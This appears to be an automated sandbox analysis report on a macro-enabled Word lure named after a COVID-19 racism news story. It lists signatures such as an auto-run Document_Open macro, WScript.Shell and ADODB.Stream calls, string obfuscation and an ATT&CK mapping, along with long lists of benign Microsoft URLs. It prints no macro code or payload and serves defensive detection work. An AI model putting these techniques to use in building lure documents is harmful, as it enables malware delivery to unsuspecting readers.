Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'ADODB.Stream' functions loadfromfile, open, read, readtext, savetofile, write, writetext
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function charset, found possibly 'ADODB.Stream' functions loadfromfile, open, read
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function CheckValidUtf8, found possibly 'ADODB.Stream' functions loadfromfile, open, read
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, exec, expandenvironmentstrings, regread, run, environ
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator, VBA macros: true
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator has summary info: false
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator application name: unknown
Source: classification engineClassification label: mal68.expl.evad.winDOCM@1/8@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{B3962497-6F20-462A-88C9-1FC5FC57EB8A} - OProcSessId.datJump to behavior
Source: Medica negra morre covid-19 apos racismo.docmOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting62Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting62LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Medica negra morre covid-19 apos racismo.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
    		high
    https://login.microsoftonline.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
      		high
      https://shell.suite.office.com:14438CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
          		high
          https://autodiscover-s.outlook.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
            		high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
              		high
              https://cdn.entity.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/query8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                		high
                https://wus2-000.contentsync.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                    		high
                    https://powerlift.acompli.net8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v18CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                      		high
                      https://cortana.ai8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspx8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                		high
                                https://api.aadrm.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                  		high
                                  https://api.microsoftstream.com/api/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                      		high
                                      https://cr.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                        		high
                                        https://portal.office.com/account/?ref=ClientMeControl8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                          		high
                                          https://ecs.office.com/config/v2/Office8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                            		high
                                            https://graph.ppe.windows.net8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                              		high
                                              https://res.getmicrosoftkey.com/api/redemptionevents8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://powerlift-frontdesk.acompli.net8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://tasks.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                		high
                                                https://officeci.azurewebsites.net/api/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                  		high
                                                  https://store.office.cn/addinstemplate8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://wus2-000.pagecontentsync.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                    		high
                                                    https://globaldisco.crm.dynamics.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                        		high
                                                        https://store.officeppe.com/addinstemplate8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://dev0-api.acompli.net/autodetect8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.odwebp.svc.ms8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                          		high
                                                          https://web.microsoftstream.com/video/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                            		high
                                                            https://graph.windows.net8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                              		high
                                                              https://dataservice.o365filtering.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://officesetup.getmicrosoftkey.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://analysis.windows.net/powerbi/api8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                		high
                                                                https://prod-global-autodetect.acompli.net/autodetect8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                  		high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                    		high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                      		high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                        		high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                          		high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                            		high
                                                                            http://weather.service.msn.com/data.aspx8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                              		high
                                                                              https://apis.live.net/v5.0/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                		high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                  		high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                    		high
                                                                                    https://management.azure.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                      		high
                                                                                      https://incidents.diagnostics.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                        		high
                                                                                        https://clients.config.office.net/user/v1.0/ios8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                          		high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                            		high
